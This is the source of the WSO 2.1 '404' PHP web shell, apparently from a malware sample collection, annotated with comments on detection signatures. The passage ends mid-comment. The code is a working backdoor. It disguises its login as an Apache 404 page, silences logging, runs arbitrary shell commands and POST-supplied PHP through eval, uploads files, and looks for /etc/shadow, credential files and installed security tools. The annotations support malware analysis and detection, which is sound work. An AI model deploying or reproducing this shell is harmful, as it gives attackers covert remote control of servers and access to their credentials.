
/Backdoors/PHP/404.php

http://web-malware-collection.googlecode.com/
PHP | 1400 lines | 1364 code | 31 blank | 5 comment | 243 complexity | 078c55ac475ab9e028f94f879f548bca MD5 | raw file


  1. <?php
  /*
   * WSO 2.1 "404" web shell -- a single-file PHP backdoor collected as a sample.
   * The annotations in this file are analyst notes only; the code is unchanged.
   * Boot sequence: crawler evasion -> session -> silence errors -> magic-quotes fixup.
   */
  2. /* WSO 2.1 (Web Shell by pgems.in) */
  3. /*Subhashdasyam.com*/
  // Operator password, stored as an unsalted MD5 digest and compared against
  // md5($_POST['pass']) in the auth gate further down in the file.
  4. $auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";
  5. $color = "#00ff00";
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  // Crawler evasion: any User-Agent containing "Google" receives a bare 404 and
  // nothing else, so the login form is never exposed to search-engine indexers.
  8. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  9. header('HTTP/1.0 404 Not Found');
  10. exit;
  11. }
  12. @session_start();
  // Anti-forensics: error reporting and logging are turned off and execution
  // limits removed, every call @-suppressed. This cluster at the top of a file
  // is itself a useful static-detection signature.
  13. @error_reporting(0);
  14. @ini_set('error_log',NULL);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @set_time_limit(0);
  18. @set_magic_quotes_runtime(0);
  19. @define('VERSION', '2.1');
  // Legacy magic_quotes_gpc compensation (PHP < 5.4): strips slashes
  // recursively, but only from $_POST -- $_GET and $_COOKIE are left untouched.
  20. if( get_magic_quotes_gpc() ) {
  21. function stripslashes_array($array) {
  22. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  23. }
  24. $_POST = stripslashes_array($_POST);
  25. }
  /*
   * Renders the decoy login page: a body that mimics Apache's default
   * "404 Not Found" response, followed by a password field whose background
   * and border are both white (see the inline <style>) so it blends into the
   * page. Operators POST `pass` to this same URL; everyone else sees a 404.
   * Never returns -- the request ends with exit.
   */
  26. function printLogin() {
  27. ?>
  28. <h1>Not Found</h1>
  29. <p>The requested URL was not found on this server.</p>
  30. <hr>
  31. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  32. <style>
  33. input { margin:0;background-color:#fff;border:1px solid #fff; }
  34. </style>
  35. <center>
  36. <form method=post>
  37. <input type=password name=pass>
  38. </form></center>
  39. <?php
  // Request ends here; callers never regain control after the login page.
  40. exit;
  41. }
  // Auth gate. The session flag is keyed by md5(HTTP_HOST) and is set when the
  // operator POSTs the right password -- or unconditionally when $auth_pass is
  // empty. The digest comparison uses loose ==; a stored digest of the form
  // "0e<digits>" would be compared numerically (not the case for the value
  // configured above, but worth knowing when triaging other copies).
  42. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  43. if( empty( $auth_pass ) ||
  44. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  45. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  46. else
  // printLogin() exits, so everything below runs only for authenticated sessions.
  47. printLogin();
  48. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  49. $os = 'win';
  50. else
  51. $os = 'nix';
  52. $safe_mode = @ini_get('safe_mode');
  53. $disable_functions = @ini_get('disable_functions');
  54. $home_cwd = @getcwd();
  // POST parameter `c` selects the working directory for the entire request;
  // every later file operation is relative to it.
  55. if( isset( $_POST['c'] ) )
  56. @chdir($_POST['c']);
  57. $cwd = @getcwd();
  58. if( $os == 'win') {
  59. $home_cwd = str_replace("\\", "/", $home_cwd);
  60. $cwd = str_replace("\\", "/", $cwd);
  61. }
  // Normalise to a trailing slash so path concatenation elsewhere works.
  62. if( $cwd[strlen($cwd)-1] != '/' )
  63. $cwd .= '/';
  // Canned command list, presumably rendered by the Console action (which is
  // outside this excerpt). The exact strings -- "find / -type f -perm -04000
  // -ls", "locate config.inc.php", "find / -perm -2 -ls", ... -- are
  // distinctive and make good matches in shell-audit / process-execution
  // telemetry when they originate from the web-server account.
  64. if($os == 'win')
  65. $aliases = array(
  66. "List Directory" => "dir",
  67. "Find index.php in current dir" => "dir /s /w /b index.php",
  68. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  69. "Show active connections" => "netstat -an",
  70. "Show running services" => "net start",
  71. "User accounts" => "net user",
  72. "Show computers" => "net view",
  73. "ARP Table" => "arp -a",
  74. "IP Configuration" => "ipconfig /all"
  75. );
  76. else
  77. $aliases = array(
  78. "List dir" => "ls -la",
  79. "list file attributes on a Linux second extended file system" => "lsattr -va",
  80. "show opened ports" => "netstat -an | grep -i listen",
  81. "Find" => "",
  82. "find all suid files" => "find / -type f -perm -04000 -ls",
  83. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  84. "find all sgid files" => "find / -type f -perm -02000 -ls",
  85. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  86. "find config.inc.php files" => "find / -type f -name config.inc.php",
  87. "find config* files" => "find / -type f -name \"config*\"",
  88. "find config* files in current dir" => "find . -type f -name \"config*\"",
  89. "find all writable folders and files" => "find / -perm -2 -ls",
  90. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  91. "find all service.pwd files" => "find / -type f -name service.pwd",
  92. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  93. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  94. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  95. "find all .bash_history files" => "find / -type f -name .bash_history",
  96. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  97. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  98. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  99. "Locate" => "",
  100. "locate httpd.conf files" => "locate httpd.conf",
  101. "locate vhosts.conf files" => "locate vhosts.conf",
  102. "locate proftpd.conf files" => "locate proftpd.conf",
  103. "locate psybnc.conf files" => "locate psybnc.conf",
  104. "locate my.conf files" => "locate my.conf",
  105. "locate admin.php files" =>"locate admin.php",
  106. "locate cfg.php files" => "locate cfg.php",
  107. "locate conf.php files" => "locate conf.php",
  108. "locate config.dat files" => "locate config.dat",
  109. "locate config.php files" => "locate config.php",
  110. "locate config.inc files" => "locate config.inc",
  111. "locate config.inc.php" => "locate config.inc.php",
  112. "locate config.default.php files" => "locate config.default.php",
  113. "locate config* files " => "locate config",
  114. "locate .conf files"=>"locate '.conf'",
  115. "locate .pwd files" => "locate '.pwd'",
  116. "locate .sql files" => "locate '.sql'",
  117. "locate .htpasswd files" => "locate '.htpasswd'",
  118. "locate .bash_history files" => "locate '.bash_history'",
  119. "locate .mysql_history files" => "locate '.mysql_history'",
  120. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  121. "locate backup files" => "locate backup",
  122. "locate dump files" => "locate dump",
  123. "locate priv files" => "locate priv"
  124. );
  /*
   * Emits the page chrome shared by every module: <head> styles, the AJAX
   * helper script, the hidden master form (fields a, c, p1, p2, p3, charset)
   * that all menu actions submit through, and the host-info banner (uname,
   * uid/gid, PHP version, disk usage, cwd breadcrumbs, drive letters on Windows).
   * Detection: the POST parameter set a/c/p1/p2/p3/charset and the action
   * names listed in $m below are stable WSO indicators in web-server logs.
   */
  125. function printHeader() {
  // $_POST['charset'] is defaulted here and later echoed raw into the <meta>
  // tag and the hidden form (no htmlspecialchars, unlike p1..p3).
  126. if(empty($_POST['charset']))
  127. $_POST['charset'] = "UTF-8";
  128. global $color;
  129. ?>
  130. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title>
  131. <style>
  132. body {background-color:#000;color:#fff;}
  133. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  134. span,h1,a { color:<?=$color?> !important; }
  135. span { font-weight: bolder; }
  136. h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
  137. div.content { padding: 5px;margin-left:5px;}
  138. a { text-decoration:none; }
  139. a:hover { background:#ff0000; }
  140. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  141. .bigarea { width:100%;height:250px; }
  142. input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
  143. form { margin:0px; }
  144. #toolsTbl { text-align:center; }
  145. .toolsInp { width: 80%; }
  146. .main th {text-align:left;}
  147. .main tr:hover{background-color:#5e5e5e;}
  148. .main td, th{vertical-align:middle;}
  149. pre {font-family:Courier,Monospace;}
  150. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  151. </style>
  152. <script>
  153. function set(a,c,p1,p2,p3,charset) {
  154. if(a != null)document.mf.a.value=a;
  155. if(c != null)document.mf.c.value=c;
  156. if(p1 != null)document.mf.p1.value=p1;
  157. if(p2 != null)document.mf.p2.value=p2;
  158. if(p3 != null)document.mf.p3.value=p3;
  159. if(charset != null)document.mf.charset.value=charset;
  160. }
  161. function g(a,c,p1,p2,p3,charset) {
  162. set(a,c,p1,p2,p3,charset);
  163. document.mf.submit();
  164. }
  165. function a(a,c,p1,p2,p3,charset) {
  166. set(a,c,p1,p2,p3,charset);
  167. var params = "ajax=true";
  168. for(i=0;i<document.mf.elements.length;i++)
  169. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  170. sr('<?=$_SERVER['REQUEST_URI'];?>', params);
  171. }
  172. function sr(url, params) {
  173. if (window.XMLHttpRequest) {
  174. req = new XMLHttpRequest();
  175. req.onreadystatechange = processReqChange;
  176. req.open("POST", url, true);
  177. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  178. req.send(params);
  179. }
  180. else if (window.ActiveXObject) {
  181. req = new ActiveXObject("Microsoft.XMLHTTP");
  182. if (req) {
  183. req.onreadystatechange = processReqChange;
  184. req.open("POST", url, true);
  185. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  186. req.send(params);
  187. }
  188. }
  189. }
  190. function processReqChange() {
  191. if( (req.readyState == 4) )
  192. if(req.status == 200) {
  193. //alert(req.responseText);
  194. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  195. var arr=reg.exec(req.responseText);
  196. eval(arr[2].substr(0, arr[1]));
  197. }
  198. else alert("Request error!");
  199. }
  200. </script>
  201. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
  202. <form method=post name=mf style='display:none;'>
  203. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
  204. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  205. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
  206. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
  207. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
  208. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  209. </form>
  210. <?php
  // Host reconnaissance for the banner. The AJAX reply format consumed by
  // processReqChange() above is "<length>\n<javascript>", which the client
  // eval()s -- see the ajax branches of actionPhp / actionStringTools.
  211. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  212. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  // Guards the percentage division below when disk_total_space fails.
  213. $totalSpace = $totalSpace?$totalSpace:1;
  214. $release = @php_uname('r');
  215. $kernel = @php_uname('s');
  // Builds an exploit-archive search link from the kernel name and version.
  // Note the strpos argument order is reversed (haystack 'Linux', needle
  // $kernel): it still matches when php_uname('s') returns exactly 'Linux',
  // but would also match any substring of it.
  216. $millink='http://milw0rm.com/search.php?dong=';
  217. if( strpos('Linux', $kernel) !== false )
  218. $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
  219. else
  220. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  // Effective user/group. posix_getpwuid/posix_getgrgid get stubs later in the
  // file, but posix_getegid does not, so its absence decides this branch.
  221. if(!function_exists('posix_getegid')) {
  222. $user = @get_current_user();
  223. $uid = @getmyuid();
  224. $gid = @getmygid();
  225. $group = "?";
  226. } else {
  227. $uid = @posix_getpwuid(@posix_geteuid());
  228. $gid = @posix_getgrgid(@posix_getegid());
  229. $user = $uid['name'];
  230. $uid = $uid['uid'];
  231. $group = $gid['name'];
  232. $gid = $gid['gid'];
  233. }
  // cwd breadcrumbs: one link per path segment, each calling g("FilesMan", prefix).
  // Segments are emitted without HTML escaping.
  234. $cwd_links = '';
  235. $path = explode("/", $GLOBALS['cwd']);
  236. $n=count($path);
  237. for($i=0;$i<$n-1;$i++) {
  238. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  239. for($j=0;$j<=$i;$j++)
  240. $cwd_links .= $path[$j].'/';
  241. $cwd_links .= "\")'>".$path[$i]."/</a>";
  242. }
  243. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  244. $opt_charsets = '';
  245. foreach($charsets as $item)
  246. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  // Module menu; the values are the `a` (action) parameter names sent by g().
  247. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
  248. if(!empty($GLOBALS['auth_pass']))
  249. $m['Logout'] = 'Logout';
  250. $m['Self remove'] = 'SelfRemove';
  251. $menu = '';
  252. foreach($m as $k => $v)
  253. $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  // Windows: probe every drive letter a-z with is_dir.
  254. $drives = "";
  255. if ($GLOBALS['os'] == 'win') {
  256. foreach( range('a','z') as $drive )
  257. if (is_dir($drive.':\\'))
  258. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  259. }
  // Banner. Note the "<font color=<?=$color?>" on the Safe-mode OFF line sits
  // inside a single-quoted PHP string, so it is emitted literally rather than
  // evaluated. Uname is also linked to a web search and to $millink.
  260. echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname
  261. User
  262. Php
  263. Hdd
  264. Cwd'.($GLOBALS['os'] == 'win'?'
  265. Drives':'').'</span></td>'.
  266. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr>
  267. :'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )
  268. :'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'
  269. :'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
  270. :'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a>
  271. :'.$drives.'</td>'.
  272. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select>
  273. <span>Server IP:</span>
  274. '.gethostbyname($_SERVER["HTTP_HOST"]).'
  275. <span>Client IP:</span>
  276. '.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
  277. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
  278. }
  /*
   * Closes the page with the bottom toolbar: change-dir, read-file, mkdir,
   * mkfile, execute-command and multipart file-upload forms. Each form drives
   * the hidden master form via g() (see printHeader), except the upload form,
   * which posts directly with a=FilesMAn / p1=uploadFile. That spelling differs
   * from 'FilesMan' elsewhere; the dispatcher is outside this excerpt, but PHP
   * function names are case-insensitive, so an 'action'.$_POST['a'] lookup
   * would still resolve.
   */
  279. function printFooter() {
  // Writability badge for the current directory, shown next to mkdir/mkfile/upload.
  280. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  281. ?>
  282. </div>
  283. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
  284. <tr>
  285. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span>
  286. <input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
  287. <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span>
  288. <input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  289. </tr>
  290. <tr>
  291. <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>
  292. <input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
  293. <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>
  294. <input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  295. </tr>
  296. <tr>
  297. <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span>
  298. <input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  299. <td><form method='post' ENCTYPE='multipart/form-data'>
  300. <input type=hidden name=a value='FilesMAn'>
  301. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  302. <input type=hidden name=p1 value='uploadFile'>
  303. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  304. <span>Upload file:</span>
  305. <input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  306. </tr>
  307. </table>
  308. </div>
  309. </body></html>
  310. <?php
  311. }
  // Stubs returning false when the posix extension is absent, guarded so the
  // stub is NOT declared when the name appears in disable_functions --
  // presumably because redeclaring a disabled-but-existing function would fatal.
  312. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  313. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  /*
   * Command-execution primitive used by every module that shells out.
   * Walks exec -> passthru -> system -> shell_exec -> popen and uses the first
   * one that is not disabled; output is returned as a string ('' if none ran).
   * Hardening note: disable_functions must cover all five of these names (and
   * popen's pclose path) for this function to be neutralised.
   */
  314. function ex($in) {
  315. $out = '';
  316. if(function_exists('exec')) {
  317. @exec($in,$out);
  318. $out = @join("\n",$out);
  319. }elseif(function_exists('passthru')) {
  320. ob_start();
  321. @passthru($in);
  322. $out = ob_get_clean();
  323. }elseif(function_exists('system')) {
  324. ob_start();
  325. @system($in);
  326. $out = ob_get_clean();
  327. }elseif(function_exists('shell_exec')) {
  328. $out = shell_exec($in);
  // Assignment inside the condition: $f is only valid in this branch.
  329. }elseif(is_resource($f = @popen($in,"r"))) {
  330. $out = "";
  331. while(!@feof($f))
  332. $out .= fread($f,1024);
  333. pclose($f);
  334. }
  335. return $out;
  336. }
  /*
   * Formats a byte count as GB/MB/KB with two decimals (binary multiples),
   * or as raw bytes below 1024. A false from a failed @filesize compares
   * below every threshold and is printed as " B".
   */
  337. function viewSize($s) {
  338. if($s >= 1073741824)
  339. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  340. elseif($s >= 1048576)
  341. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  342. elseif($s >= 1024)
  343. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  344. else
  345. return $s . ' B';
  346. }
  /*
   * Renders a fileperms() mode word as an ls -l style string, e.g. "-rwxr-x---".
   * The type character comes from the S_IFMT bits; the masks are tested with
   * == against composite values, so the order matters (0xC000 socket is checked
   * before 0x8000 regular / 0x4000 dir, whose bits it contains). The execute
   * column folds in setuid (0x0800), setgid (0x0400) and sticky (0x0200).
   */
  347. function perms($p) {
  348. if (($p & 0xC000) == 0xC000)$i = 's';
  349. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  350. elseif (($p & 0x8000) == 0x8000)$i = '-';
  351. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  352. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  353. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  354. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  355. else $i = 'u';
  // Owner triplet.
  356. $i .= (($p & 0x0100) ? 'r' : '-');
  357. $i .= (($p & 0x0080) ? 'w' : '-');
  358. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  // Group triplet.
  359. $i .= (($p & 0x0020) ? 'r' : '-');
  360. $i .= (($p & 0x0010) ? 'w' : '-');
  361. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  // Other triplet.
  362. $i .= (($p & 0x0004) ? 'r' : '-');
  363. $i .= (($p & 0x0002) ? 'w' : '-');
  364. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  365. return $i;
  366. }
  /*
   * perms() string wrapped in a colour cue for the listing: red when the
   * web-server account cannot read the path, white when read-only, green when
   * writable. fileperms is called separately in each branch.
   */
  367. function viewPermsColor($f) {
  368. if (!@is_readable($f))
  369. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  370. elseif (!@is_writable($f))
  371. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  372. else
  373. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  374. }
  // scandir() polyfill for very old PHP. Unlike the builtin it does not sort,
  // never calls closedir, and returns null (not an array) when nothing was read
  // because $files is only created inside the loop; a failed opendir is not
  // checked either.
  375. if(!function_exists("scandir")) {
  376. function scandir($dir) {
  377. $dh = opendir($dir);
  378. while (false !== ($filename = readdir($dh))) {
  379. $files[] = $filename;
  380. }
  381. return $files;
  382. }
  383. }
  /*
   * Shells out `which <name>` via ex() and returns the resolved path, or false
   * when the output is empty. $p is concatenated unquoted; within this excerpt
   * it is only ever called with hard-coded tool names from actionSecInfo.
   */
  384. function which($p) {
  385. $path = ex('which '.$p);
  386. if(!empty($path))
  387. return $path;
  388. return false;
  389. }
  /*
   * "Sec. Info" module: host reconnaissance. Reports PHP hardening
   * (disable_functions, open_basedir, safe_mode dirs), available DB client
   * libraries, and on *nix whether /etc/passwd and /etc/shadow are readable,
   * /proc/version, /etc/issue.net, /etc/hosts, /etc/fstab and `df -h`. It then
   * probes with which() for compilers/interpreters ("Userful"), security
   * tooling ("Danger": AV, HIDS, firewalls, rootkit checkers, log monitors) and
   * download utilities. On Windows it runs ver / net accounts / net user.
   * Detection: a burst of `which kav`, `which snort`, `which rkhunter`, ...
   * from the web-server account is a strong indicator of this module running.
   */
  390. function actionSecInfo() {
  391. printHeader();
  392. echo '<h1>Server security information</h1><div class=content>';
  // Nested helper declared on first call. Name and value are echoed unescaped;
  // multi-line values go into a <pre>.
  393. function showSecParam($n, $v) {
  394. $v = trim($v);
  395. if($v) {
  396. echo '<span>'.$n.': </span>';
  397. if(strpos($v, "\n") === false)
  398. echo $v.'
  399. ';
  400. else
  401. echo '<pre class=ml1>'.$v.'</pre>';
  402. }
  403. }
  404. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  405. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  406. showSecParam('Open base dir', @ini_get('open_basedir'));
  407. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  408. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  409. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  410. $temp=array();
  411. if(function_exists('mysql_get_client_info'))
  412. $temp[] = "MySql (".mysql_get_client_info().")";
  413. if(function_exists('mssql_connect'))
  414. $temp[] = "MSSQL";
  415. if(function_exists('pg_connect'))
  416. $temp[] = "PostgreSQL";
  417. if(function_exists('oci_connect'))
  418. $temp[] = "Oracle";
  419. showSecParam('Supported databases', implode(', ', $temp));
  420. echo '
  421. ';
  422. if( $GLOBALS['os'] == 'nix' ) {
  423. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  424. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  425. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  426. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  // The shadow link passes "etc" without the leading slash, unlike the passwd
  // link above -- looks like a typo that would resolve relative to the cwd.
  427. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  428. showSecParam('OS version', @file_get_contents('/proc/version'));
  429. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  // The which()/ex() probes are skipped entirely under safe_mode.
  430. if(!$GLOBALS['safe_mode']) {
  431. echo '
  432. ';
  433. $temp=array();
  434. foreach ($userful as $item)
  435. if(which($item)){$temp[]=$item;}
  436. showSecParam('Userful', implode(', ',$temp));
  437. $temp=array();
  438. foreach ($danger as $item)
  439. if(which($item)){$temp[]=$item;}
  440. showSecParam('Danger', implode(', ',$temp));
  441. $temp=array();
  442. foreach ($downloaders as $item)
  443. if(which($item)){$temp[]=$item;}
  444. showSecParam('Downloaders', implode(', ',$temp));
  445. echo '
  446. ';
  447. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  448. showSecParam('HDD space', ex('df -h'));
  449. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  450. }
  451. } else {
  452. showSecParam('OS Version',ex('ver'));
  453. showSecParam('Account Settings',ex('net accounts'));
  454. showSecParam('User Accounts',ex('net user'));
  455. }
  456. echo '</div>';
  457. printFooter();
  458. }
  /*
   * "Php" module: evaluates attacker-supplied PHP from POST p1 with eval().
   * Two paths: an AJAX reply that returns "<length>\n<javascript>" for the
   * client-side eval in processReqChange() (printHeader), and a full page that
   * optionally embeds phpinfo() with its stylesheet stripped by preg_replace.
   * A session flag remembers the "send using AJAX" checkbox state.
   * Detection: POST bodies with a=Php and a p1 that parses as PHP source.
   */
  459. function actionPhp() {
  460. if( isset($_POST['ajax']) ) {
  461. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  462. ob_start();
  // Arbitrary code execution; output is captured and JS-escaped for the client.
  463. eval($_POST['p1']);
  464. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  465. echo strlen($temp), "\n", $temp;
  466. exit;
  467. }
  468. printHeader();
  469. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  470. echo '<h1>PHP info</h1><div class=content>';
  471. ob_start();
  472. phpinfo();
  473. $tmp = ob_get_clean();
  // Strip phpinfo's own CSS/headings so it fits the shell's page styling.
  474. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  475. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  476. $tmp = preg_replace('!h1!msiU','h2',$tmp);
  477. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  478. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  479. echo $tmp;
  480. echo '</div>
  481. ';
  482. }
  483. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  484. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  485. echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  486. echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  // Non-AJAX path: same eval, output HTML-escaped into the <pre>.
  487. if(!empty($_POST['p1'])) {
  488. ob_start();
  489. eval($_POST['p1']);
  490. echo htmlspecialchars(ob_get_clean());
  491. }
  492. echo '</pre></div>';
  493. printFooter();
  494. }
  /*
   * "Files" module: file manager for the current working directory.
   * Operations selected by POST p1: uploadFile (move_uploaded_file to the
